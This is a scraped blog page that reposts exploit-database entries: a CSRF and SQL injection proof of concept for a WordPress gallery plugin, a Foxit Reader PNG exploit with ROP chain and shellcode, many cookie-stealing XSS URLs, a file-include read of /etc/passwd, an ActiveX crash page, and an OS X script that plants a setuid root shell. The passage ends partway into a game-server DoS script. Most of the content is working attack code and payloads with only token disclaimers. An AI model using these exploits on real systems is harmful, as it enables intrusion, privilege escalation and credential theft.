Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863141542

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Title: Cross-Site Request Forgery & SQL Injection Vulnerabilities in Unite Gallery Lite Wordpress Plugin v1.4.6
# Submitter: Nitin Venkatesh
# Product: Unite Gallery Lite Wordpress Plugin
# Product URL: https://wordpress.org/plugins/unite-gallery-lite/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Improper
Neutralization of Special Elements used in an SQL Command ('SQL
Injection')[CWE-89]
# Affected Versions: v1.4.6 and possibly below.
# Tested versions: v1.4.6
# Fixed Version: v1.5
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1178586/unite-gallery-lite
# Changelog: https://wordpress.org/plugins/unite-gallery-lite/changelog/
# CVE Status: New & Unassigned

## Product Information:

The Unite Gallery is all in one image and video gallery for WordPress.

## Vulnerability Description:

The admin forms of the Unite Gallery Lite Wordpress Plugin are susceptible
to CSRF. Additionally, the following parameters were found to be
susceptible to SQLi -

Form submitted to /wp-admin/admin-ajax.php:
- data[galleryID]

Form submitted to /wp-admin/admin.php:
- galleryid
- id

## Proof of Concept:

<!DOCTYPE html>
<html>
<head>
<title>CSRF + SQLi in Unite Gallery Lite Wordpress Plugin v1.4.6</title>
</head>
<body>
<h1>CSRF + SQLi in Unite Gallery Lite Wordpress Plugin v1.4.6</h1>
<p>CSRF - Create Gallery</p>
<form action="http://localhost/wp-admin//admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='create_gallery' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[main][title]" value='test 2' />
<input type="hidden" name="data[main][alias]" value='test2' />
<input type="hidden" name="data[main][category]" value='new' />
<input type="hidden" name="data[main][full_width]" value='true' />
<input type="hidden" name="data[main][gallery_width]" value='1000' />
<input type="submit" value="submit" />
</form>

<p>CSRF + SQLi - Update Gallery</p>
<form action="http://localhost/wp-admin//admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='update_gallery' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[main][title]" value='test 2' />
<input type="hidden" name="data[main][alias]" value='test2' />
<input type="hidden" name="data[main][shortcode]" value='[unitegallery
test2]' />
<input type="hidden" name="data[main][category]" value='3' />
<input type="hidden" name="data[main][full_width]" value='true' />
<input type="hidden" name="data[main][gallery_width]" value='1000' />
<input type="hidden" name="data[main][gallery_min_width]" value='150' />
<input type="hidden" name="data[params][tile_width]" value='160' />
<input type="hidden" name="data[params][tile_height]" value='160' />
<input type="hidden" name="data[params][theme_gallery_padding]" value='0' />
<input type="hidden" name="data[params][theme_carousel_align]"
value='center' />
<input type="hidden" name="data[params][theme_carousel_offset]" value='0' />
<input type="hidden" name="data[params][gallery_shuffle]" value='false' />
<input type="hidden" name="data[params][tile_image_resolution]"
value='medium' />
<input type="hidden" name="data[params][carousel_padding]" value='8' />
<input type="hidden" name="data[params][carousel_space_between_tiles]"
value='20' />
<input type="hidden" name="data[params][carousel_scroll_duration]"
value='500' />
<input type="hidden" name="data[params][carousel_scroll_easing]"
value='easeOutCubic' />
<input type="hidden" name="data[params][carousel_autoplay]" value='true' />
<input type="hidden" name="data[params][carousel_autoplay_timeout]"
value='3000' />
<input type="hidden" name="data[params][carousel_autoplay_direction]"
value='right' />
<input type="hidden" name="data[params][carousel_autoplay_pause_onhover]"
value='true' />
<input type="hidden" name="data[params][theme_enable_navigation]"
value='true' />
<input type="hidden" name="data[params][theme_navigation_enable_play]"
value='true' />
<input type="hidden" name="data[params][theme_navigation_align]"
value='center' />
<input type="hidden" name="data[params][theme_navigation_offset_hor]"
value='0' />
<input type="hidden" name="data[params][theme_navigation_position]"
value='bottom' />
<input type="hidden" name="data[params][theme_navigation_margin]"
value='20' />
<input type="hidden" name="data[params][theme_space_between_arrows]"
value='5' />
<input type="hidden" name="data[params][carousel_navigation_numtiles]"
value='3' />
<input type="hidden" name="data[params][position]" value='center' />
<input type="hidden" name="data[params][margin_top]" value='0' />
<input type="hidden" name="data[params][margin_bottom]" value='0' />
<input type="hidden" name="data[params][margin_left]" value='0' />
<input type="hidden" name="data[params][margin_right]" value='0' />
<input type="hidden" name="data[params][tile_enable_action]" value='true' />
<input type="hidden" name="data[params][tile_as_link]" value='false' />
<input type="hidden" name="data[params][tile_link_newpage]" value='true' />
<input type="hidden" name="data[params][tile_enable_border]" value='true' />
<input type="hidden" name="data[params][tile_border_width]" value='3' />
<input type="hidden" name="data[params][tile_border_color]" value='#f0f0f0'
/>
<input type="hidden" name="data[params][tile_border_radius]" value='0' />
<input type="hidden" name="data[params][tile_enable_outline]" value='true'
/>
<input type="hidden" name="data[params][tile_outline_color]"
value='#8b8b8b' />
<input type="hidden" name="data[params][tile_enable_shadow]" value='false'
/>
<input type="hidden" name="data[params][tile_shadow_h]" value='1' />
<input type="hidden" name="data[params][tile_shadow_v]" value='1' />
<input type="hidden" name="data[params][tile_shadow_blur]" value='3' />
<input type="hidden" name="data[params][tile_shadow_spread]" value='2' />
<input type="hidden" name="data[params][tile_shadow_color]" value='#8b8b8b'
/>
<input type="hidden" name="data[params][tile_enable_image_effect]"
value='false' />
<input type="hidden" name="data[params][tile_image_effect_type]" value='bw'
/>
<input type="hidden" name="data[params][tile_image_effect_reverse]"
value='false' />
<input type="hidden" name="data[params][tile_enable_overlay]" value='true'
/>
<input type="hidden" name="data[params][tile_overlay_opacity]" value='0.4'
/>
<input type="hidden" name="data[params][tile_overlay_color]"
value='#000000' />
<input type="hidden" name="data[params][tile_enable_icons]" value='true' />
<input type="hidden" name="data[params][tile_show_link_icon]" value='false'
/>
<input type="hidden" name="data[params][tile_space_between_icons]"
value='26' />
<input type="hidden" name="data[params][tile_enable_textpanel]"
value='false' />
<input type="hidden" name="data[params][tile_textpanel_source]"
value='title' />
<input type="hidden" name="data[params][tile_textpanel_always_on]"
value='false' />
<input type="hidden" name="data[params][tile_textpanel_appear_type]"
value='slide' />
<input type="hidden" name="data[params][tile_textpanel_padding_top]"
value='8' />
<input type="hidden" name="data[params][tile_textpanel_padding_bottom]"
value='8' />
<input type="hidden" name="data[params][tile_textpanel_padding_left]"
value='11' />
<input type="hidden" name="data[params][tile_textpanel_padding_right]"
value='11' />
<input type="hidden" name="data[params][tile_textpanel_bg_color]"
value='#000000' />
<input type="hidden" name="data[params][tile_textpanel_bg_opacity]"
value='0.6' />
<input type="hidden" name="data[params][tile_textpanel_title_color]"
value='#ffffff' />
<input type="hidden" name="data[params][tile_textpanel_title_text_align]"
value='left' />
<input type="hidden" name="data[params][tile_textpanel_title_font_size]"
value='14' />
<input type="hidden" name="data[params][tile_textpanel_title_bold]"
value='true' />
<input type="hidden" name="data[params][lightbox_type]" value='wide' />
<input type="hidden" name="data[params][lightbox_hide_arrows_onvideoplay]"
value='true' />
<input type="hidden" name="data[params][lightbox_slider_control_zoom]"
value='true' />
<input type="hidden" name="data[params][gallery_mousewheel_role]"
value='zoom' />
<input type="hidden" name="data[params][lightbox_overlay_opacity]"
value='1' />
<input type="hidden" name="data[params][lightbox_overlay_color]"
value='#000000' />
<input type="hidden" name="data[params][lightbox_top_panel_opacity]"
value='0.4' />
<input type="hidden" name="data[params][lightbox_show_numbers]"
value='true' />
<input type="hidden" name="data[params][lightbox_numbers_size]" value='14'
/>
<input type="hidden" name="data[params][lightbox_numbers_color]"
value='#e5e5e5' />
<input type="hidden" name="data[params][lightbox_show_textpanel]"
value='true' />
<input type="hidden" name="data[params][lightbox_textpanel_width]"
value='550' />
<input type="hidden" name="data[params][lightbox_textpanel_source]"
value='title' />
<input type="hidden" name="data[params][lightbox_textpanel_title_color]"
value='#e5e5e5' />
<input type="hidden"
name="data[params][lightbox_textpanel_title_text_align]" value='left' />
<input type="hidden"
name="data[params][lightbox_textpanel_title_font_size]" value='14' />
<input type="hidden" name="data[params][lightbox_textpanel_title_bold]"
value='false' />
<input type="hidden" name="data[params][lightbox_compact_overlay_opacity]"
value='0.6' />
<input type="hidden" name="data[params][lightbox_compact_overlay_color]"
value='#000000' />
<input type="hidden" name="data[params][lightbox_arrows_position]"
value='sides' />
<input type="hidden" name="data[params][lightbox_arrows_inside_alwayson]"
value='false' />
<input type="hidden" name="data[params][lightbox_compact_show_numbers]"
value='true' />
<input type="hidden" name="data[params][lightbox_compact_numbers_size]"
value='14' />
<input type="hidden" name="data[params][lightbox_compact_numbers_color]"
value='#e5e5e5' />
<input type="hidden"
name="data[params][lightbox_compact_numbers_padding_top]" value='7' />
<input type="hidden"
name="data[params][lightbox_compact_numbers_padding_right]" value='5' />
<input type="hidden" name="data[params][lightbox_compact_show_textpanel]"
value='true' />
<input type="hidden" name="data[params][lightbox_compact_textpanel_source]"
value='title' />
<input type="hidden"
name="data[params][lightbox_compact_textpanel_title_color]" value='#e5e5e5'
/>
<input type="hidden"
name="data[params][lightbox_compact_textpanel_title_font_size]" value='14'
/>
<input type="hidden"
name="data[params][lightbox_compact_textpanel_title_bold]" value='false' />
<input type="hidden"
name="data[params][lightbox_compact_textpanel_padding_top]" value='5' />
<input type="hidden"
name="data[params][lightbox_compact_textpanel_padding_left]" value='10' />
<input type="hidden"
name="data[params][lightbox_compact_textpanel_padding_right]" value='10' />
<input type="hidden"
name="data[params][lightbox_compact_slider_image_border]" value='true' />
<input type="hidden"
name="data[params][lightbox_compact_slider_image_border_width]" value='10'
/>
<input type="hidden"
name="data[params][lightbox_compact_slider_image_border_color]"
value='#ffffff' />
<input type="hidden"
name="data[params][lightbox_compact_slider_image_border_radius]" value='0'
/>
<input type="hidden"
name="data[params][lightbox_compact_slider_image_shadow]" value='true' />
<input type="hidden" name="data[params][include_jquery]" value='true' />
<input type="hidden" name="data[params][js_to_body]" value='false' />
<input type="hidden" name="data[params][compress_output]" value='false' />
<input type="hidden" name="data[params][gallery_debug_errors]"
value='false' />

<!-- SQLi -->
<input type="hidden" name="data[galleryID]" value='1 AND (SELECT * FROM
(SELECT(SLEEP(5)))rock)' />
<input type="submit" value="submit" />
</form>

<p>CSRF - Add Items</p>
<form action="http://localhost/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='add_item' />
<input type="hidden" name="gallery_type" value='' />
<input type="hidden" name="data[type]" value='html5video' />
<input type="hidden" name="data[title]" value='test' />
<input type="hidden" name="data[description]" value='' />
<input type="hidden" name="data[urlImage]" value='' />
<input type="hidden" name="data[urlThumb]" value='' />
<input type="hidden" name="data[urlVideo_mp4]" value='
http://video-js.zencoder.com/oceans-clip.mp4' />
<input type="hidden" name="data[urlVideo_webm]" value='
http://video-js.zencoder.com/oceans-clip.webm' />
<input type="hidden" name="data[urlVideo_ogv]" value='
http://video-js.zencoder.com/oceans-clip.ogv' />
<input type="hidden" name="data[catID]" value='4' />
<input type="submit" value="submit" />
</form>

<p>CSRF + SQLi - Retrieve Items (Edit Settings - Items Tab)</p>
<form action="http://localhost/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='get_cat_items' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[catID]" value='3' />

<!-- SQLi -->
<input type="hidden" name="data[galleryID]" value='1 AND (SELECT * FROM
(SELECT(SLEEP(5)))rock)' />
<input type="submit" value="submit" />
</form>

<p> CSRF + SQLi - Action buttons</p>
<ul>
<li>
<a href="
http://localhost/wp-admin/admin.php?page=unitegallery&view=items&galleryid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
">
http://localhost/wp-admin/admin.php?page=unitegallery&view=items&galleryid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
</a></li>
<li>
<a href="
http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
">
http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
</a>
</li>
</ul>
</body>
</html>

## Solution:

Upgrade to v1.5 or higher

## Disclosure Timeline:

2015-06-06 - Discovered. Reported to developer.
2015-06-10 - Updated version released.
2015-07-25 - Publishing disclosure on FD mailing list

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.
HireHackking 
# Exploit Title: Foxit Reader PNG Conversion Parsing tEXt chunk - Arbitrary Code Execution
# Date: 07/07/2015
# Exploit Author: Sascha Schirra
# Vendor Homepage: https://www.foxitsoftware.com
# Software Link: https://www.foxitsoftware.com/downloads/
# Version: 7.0.8 - 7.1.5 (maybe also older versions) tested versions 7.1.5 and 7.0.8
# Tested on: Windows 7 SP1
# Vendor informed and bug confirmed: July 08th, 2015

"""
This is a PoC (ASLR/DEP bypass)
For ASLR bypass jrsysCrypt.dll is used, which doesn't make use of ASLR
For DEP bypass a ropchain is used which call ZwProtectVirtualMemory through fastsyscall.
This script looks for a tEXt chunk in a png file and replace this chunk with two other tEXt chunks.
The first of them triggers the vulnerability and the second one contains a ropchain and shellcode.
"""

import binascii
import struct
import re
import sys

p = lambda x:struct.pack('I', x)

if len(sys.argv) < 2:
    print('usage: %s <pngfile>' % sys.argv[0])
    exit()

print('Open file: %s' % sys.argv[1])
with open(sys.argv[1],'rb') as f:
    data = f.read()

m = re.search('tEXt', data)
if not m:
    print('No tEXt chunk')
    exit()
print('tEXt chunk found')
start = data[:m.start()-4]
length = struct.unpack('>I', data[m.start()-4:m.start()])[0]
end = data[m.end()+length + 4:]

vulnChunk = 'tEXt\0' # vulnerable because of the missing keyword
vulnChunk += 'A'*8
vulnChunk += p(0x10041a14) # xchg eax, ecx; ret;
vulnChunk += p(0x10067e0a) # xchg eax, ebp; add byte ptr [eax], al; add esp, 4; ret;
vulnChunk += 'AAAA'
vulnChunk += p(0x10013d24) # mov esp, ebp; pop ebp; ret;
vulnChunk += 'A'*16
vulnChunk += '\x0a\xd2' # Partial Overwrite This have to be changed on each system. Another solution is needed here.


vulnlen = struct.pack('>I', 0x2b) # length os 0x2b is needed to overwrite 2 bytes of the this pointer.
vulnChunkCRC32 = struct.pack('>i',binascii.crc32(vulnChunk))

secondChunk = 'AAA\0'*(580) 
secondChunk += p(0x10009b40) # Pointer to the following gadget: MOV EDX,DWORD PTR SS:[ESP+2C]; MOV EAX,DWORD PTR SS:[ESP+28]; PUSH EDX; MOV EDX,DWORD PTR SS:[ESP+24]; PUSH EAX; PUSH ESI; PUSH EDX; PUSH EDI; CALL DWORD PTR DS:[ECX+14]
secondChunk += p(0x1007c853) # pop esi; pop edi; pop ebx; pop ebp; ret;
secondChunk += p(0x1000ba26) # xchg eax, esp; rcr byte ptr [esi + 0x5d], 0x40; pop ebx; add esp, 0x18; ret;
secondChunk += 'AAAA'*2
secondChunk += p(0x1006265d) # mov eax, dword ptr [esp + 0xc]; push eax; call dword ptr [ecx + 8];


# calc shellcode - metasploit
buf =  "\x83\xc4\xce"
buf += "\xda\xc8\xbb\x15\xee\x3a\x64\xd9\x74\x24\xf4\x5d\x33"
buf += "\xc9\xb1\x30\x31\x5d\x18\x83\xed\xfc\x03\x5d\x01\x0c"
buf += "\xcf\x98\xc1\x52\x30\x61\x11\x33\xb8\x84\x20\x73\xde"
buf += "\xcd\x12\x43\x94\x80\x9e\x28\xf8\x30\x15\x5c\xd5\x37"
buf += "\x9e\xeb\x03\x79\x1f\x47\x77\x18\xa3\x9a\xa4\xfa\x9a"
buf += "\x54\xb9\xfb\xdb\x89\x30\xa9\xb4\xc6\xe7\x5e\xb1\x93"
buf += "\x3b\xd4\x89\x32\x3c\x09\x59\x34\x6d\x9c\xd2\x6f\xad"
buf += "\x1e\x37\x04\xe4\x38\x54\x21\xbe\xb3\xae\xdd\x41\x12"
buf += "\xff\x1e\xed\x5b\x30\xed\xef\x9c\xf6\x0e\x9a\xd4\x05"
buf += "\xb2\x9d\x22\x74\x68\x2b\xb1\xde\xfb\x8b\x1d\xdf\x28"
buf += "\x4d\xd5\xd3\x85\x19\xb1\xf7\x18\xcd\xc9\x03\x90\xf0"
buf += "\x1d\x82\xe2\xd6\xb9\xcf\xb1\x77\x9b\xb5\x14\x87\xfb"
buf += "\x16\xc8\x2d\x77\xba\x1d\x5c\xda\xd0\xe0\xd2\x60\x96"
buf += "\xe3\xec\x6a\x86\x8b\xdd\xe1\x49\xcb\xe1\x23\x2e\x23"
buf += "\xa8\x6e\x06\xac\x75\xfb\x1b\xb1\x85\xd1\x5f\xcc\x05"
buf += "\xd0\x1f\x2b\x15\x91\x1a\x77\x91\x49\x56\xe8\x74\x6e"
buf += "\xc5\x09\x5d\x0d\x88\x99\x3d\xd2"


shellcode=buf
rop = ''
# Write Size to data section
rop += p(0x1002d346) #pop eax; ret
rop += p(0x100aa004) # data section
rop += p(0x100012ca) #pop ecx; ret
rop += p(0x1000)

# Write baseaddr (esp) to data section
rop += p(0x1001dd25) #mov dword ptr [eax], ecx; ret;
rop += p(0x1007b25c) #push esp; add eax, 0x20; pop ebx; ret;
rop += p(0x1002d346) #pop eax; ret
rop += p(0x100aa008) # data section
rop += p(0x1004eacc) #mov dword ptr [eax], ebx; pop ebx; ret;
rop += p(0xdeadc0de)

# dereference syscall and call it
rop += p(0x1002d346) #pop eax; ret
rop += p(0x7ffe0300) # fastsyscall
rop += p(0x10010ff4) #mov ecx, dword ptr [eax]; mov eax, [ecx]; ret;
rop += p(0x1002d346) #pop eax; ret
rop += p(0xd7) #syscall
rop += p(0x10081541) #push ecx;cld; ret

rop += p(0x100801f5) # 6xpop; ret
rop += p(0xdeadc0de)
rop += p(0xffffffff)
rop += p(0x100aa008) # datasection Pointer to baseaddress
rop += p(0x100aa004) # datasection Pointer to size
rop += p(0x40)
rop += p(0x100aa00c)
rop += p(0x1006c63b) # push esp, ret

rop += shellcode

secondChunk +=rop
secondChunk += 'A'*4000
secondChunk = secondChunk[:4000] 

secondChunkLen = struct.pack('>i', len(secondChunk)+1) 
secondChunk = 'tEXt'+'\0'+secondChunk
secondChunkCRC32 = struct.pack('>i',binascii.crc32(secondChunk))

with open('exploit_'+sys.argv[1],'wb') as f:
	f.write(start+(secondChunkLen + secondChunk + secondChunkCRC32) +vulnlen + vulnChunk + vulnChunkCRC32+ end)

print('Exploit file created: %s' % ('exploit_'+sys.argv[1]))
HireHackking 
source: https://www.securityfocus.com/bid/55405/info

phpFox is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

phpFox 3.3.0 is vulnerable; other versions may also be affected. 

http://www.example.com//static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message="><script>alert(document.cookie);</script>&width=300

http://www.example.com//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id="><script>alert(document.cookie);</script>&item_id=518&_=1346525603467

http://www.example.com//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id=id&item_id=518"><script>alert(document.cookie);</script>&_=1346525603467
HireHackking 
source: https://www.securityfocus.com/bid/55417/info

Kayako Fusion is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Kayako Fusion 4.40.1148 is vulnerable; other versions may also be affected. 

http://www.example.com/__swift/thirdparty/PHPExcel/PHPExcel/Shared/JAMA/docs/download.php/%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/55237/info

Mihalism Multi Host is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mihalism Multi Host 5.0 is vulnerable; other versions may also be affected. 

http://www.example.com/users.php?act=register&return=/><sCrIpT>alert('Explo!ter')</sCrIpT>
HireHackking 
source: https://www.securityfocus.com/bid/55395/info

Cm3 CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/forums/search.asp?strSearchPhrase="><script>alert(0);</script>&ContainerID=&forumsearchoption=topics

http://www.example.com/search.asp?keywords="><script>alert(0);</script>&SearchType=And&CurrentPage=1

http://www.example.com/search.asp?CurrentPage=1&sitekeywords"><script>alert(0);</script>&SearchType=Default

http://www.example.com/search.asp?SearchType=Keywords&Keywords="><script>alert(0);</script>&x=0&y=0
HireHackking 
source: https://www.securityfocus.com/bid/55220/info

Web Wiz Forums is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Web Wiz Forums 10.03 is vulnerable; other versions may also be affected. 

http://www.example.com/forum_members.asp?find=S&ForumID=%22%3E%3Cscript%3Ealert(0);%3C/script%3E

http://www.example.com/forum_members.asp?find=S&ForumID=%22%3E%3Cscript%3Ealert(0);%3C/script%3E

http://www.www.example.com/post_message_form.asp?ForumID=63&mode=new&PagePosition=0&ReturnPage=Thread&ThreadPage="><script>alert(0);</script>&TopicID=57676
HireHackking 
source: https://www.securityfocus.com/bid/55222/info

LibGuides is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/cat.php?cid=%22%3E%3Cscript%3Ealert(0);%3C/script%3E

http://www.example.com/cat.php?cid=%22%3E%3Cscript%3Ealert(0);%3C/script%3E

http://www.example.com/cat.php?cid=%22%3E%3Cscript%3Ealert(0);%3C/script%3E

http://www.example.com/mobile.php?action=8&gid=&iid=145&search=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/55217/info

The Finder plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/55216/info

Power-eCommerce is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com//Questions.asp?id="><script>alert(0);</script>

http://www.example.com/search.asp?7="><script>alert(0);</script>&Search=Search
HireHackking 
source: https://www.securityfocus.com/bid/55212/info

The Komento component for Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

www.example.com/component/komento/?view=rss&format=feed&component=com_content&cid=[id][sql injection]
HireHackking 
source: https://www.securityfocus.com/bid/55199/info

JW Player is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

JW Player 5.10.2295 and prior versions are also vulnerable. 

http://www.example.com/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
HireHackking 
source: https://www.securityfocus.com/bid/55202/info

Microsoft Indexing Service 'ixsso.dll' ActiveX control is prone to a denial-of-service vulnerability due to a null-pointer dereference error.

An attacker may exploit this issue by enticing victims into opening a malicious webpage or HTML email that invokes the affected control.

The attacker can exploit this issue to cause denial-of-service conditions in Internet Explorer or other applications that use the vulnerable ActiveX control. Due to the nature of this issue, arbitrary code execution may be possible, but this has not been confirmed. 

<html> Exploit <object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024' id='target' /></object> <script language='vbscript'> targetFile = "C:\WINDOWS\system32\ixsso.dll" prototype = "Property Let OnStartPage As object" memberName = "OnStartPage" progid = "Cisso.CissoQuery" argCount = 1 Set arg1=Nothing target.OnStartPage arg1 </script>
HireHackking 
source: https://www.securityfocus.com/bid/55205/info

PHP Web Scripts Text Exchange Pro is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. 

http://www.example.com/textexchangepro/index.php?page=../../../../../../../../../../etc/passwd%00
HireHackking 
source: https://www.securityfocus.com/bid/55194/info

Websense Content Gateway is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

https://www.example.com:8081/monitor/m_overview.ink?mode=0&menu=</script><img%20src%3Dhttp%3A%2f%2fwww.evilanother.com%2fimages%2fcross_site.jpg>
https://www.example.com:8081/monitor/m_overview.ink?mode=0&menu=</script><meta%20http-equiv%3D%22refresh%22%20content%3D%220%3BURL%3Dhttps%3A%2f%2fwww.evil.com%2ftrojan.exe%22>
HireHackking 
#!/bin/sh
#
# Simple Proof of Concept Exploit for the DYLD_PRINT_TO_FILE
# local privilege escalation vulnerability in OS X 10.10 - 10.10.4
#
# (C) Copyright 2015 Stefan Esser <stefan.esser@sektioneins.de>
#
# Wait months for a fix from Apple or install the following KEXT as protection
# https://github.com/sektioneins/SUIDGuard
#
# Use at your own risk. This copies files around with root permissions,
# overwrites them and deletes them afterwards. Any glitch could corrupt your
# system. So you have been warned.

SUIDVICTIM=/usr/bin/newgrp

# why even try to prevent a race condition?
TARGET=`pwd`/tmpXXXXX

rm -rf $TARGET
mkdir $TARGET

cat << EOF > $TARGET/boomsh.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main()
{
        setuid(0);
        setgid(0);
        system("/bin/bash -i");
        printf("done.\n");
        return 0;
}
EOF
cat << EOF > $TARGET/overwrite.c
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>

int main(int argc, char **argv)
{
        int fd;
        char buffer[1024];
        ssize_t toread, numread;
        ssize_t numwritten;
        ssize_t size;

        /* disable O_APPEND */
        fcntl(3, F_SETFL, 0);
        lseek(3, 0, SEEK_SET);

        /* write file into it */
        fd = open(
EOF
echo "\"$TARGET/boomsh\"" >> $TARGET/overwrite.c
cat << EOF >> $TARGET/overwrite.c
        , O_RDONLY, 0);
        if (fd > 0) {

                /* determine size */
                size = lseek(fd, 0, SEEK_END);
                lseek(fd, 0, SEEK_SET);

                while (size > 0) {
                        if (size > sizeof(buffer)) {
                                toread = sizeof(buffer);
                        } else {
                                toread = size;
                        }

                        numread = read(fd, &buffer, toread);
                        if (numread < toread) {
                                fprintf(stderr, "problem reading\n");
                                _exit(2);
                        }
                        numwritten = write(3, &buffer, numread);
                        if (numread != numwritten) {
                                fprintf(stderr, "problem writing\n");
                                _exit(2);
                        }

                        size -= numwritten;

                }

                fsync(3);
                close(fd);
        } else {
                fprintf(stderr, "Cannot open for reading\n");
        }

        return 0;
}
EOF

cp $SUIDVICTIM $TARGET/backup
gcc -o $TARGET/overwrite $TARGET/overwrite.c
gcc -o $TARGET/boomsh $TARGET/boomsh.c

EDITOR=$TARGET/overwrite DYLD_PRINT_TO_FILE=$SUIDVICTIM crontab -e 2> /dev/null
echo "cp $TARGET/boomsh /usr/bin/boomsh; chmod 04755 /usr/bin/boomsh " | $SUIDVICTIM > /dev/null 2> /dev/null
echo "cp $TARGET/backup $SUIDVICTIM" | /usr/bin/boomsh > /dev/null 2> /dev/null

rm -rf $TARGET

/usr/bin/boomsh
HireHackking 
#!/usr/bin/perl
#
#  Counter-Strike 1.6 'GameInfo' Query Reflection DoS
#  Proof Of Concept
#
#  Copyright 2015 (c) Todor Donev 
#  todor.donev@gmail.com
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#  http://pastebin.com/u/hackerscommunity 
#
#
#  Disclaimer:
#  This or previous program is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
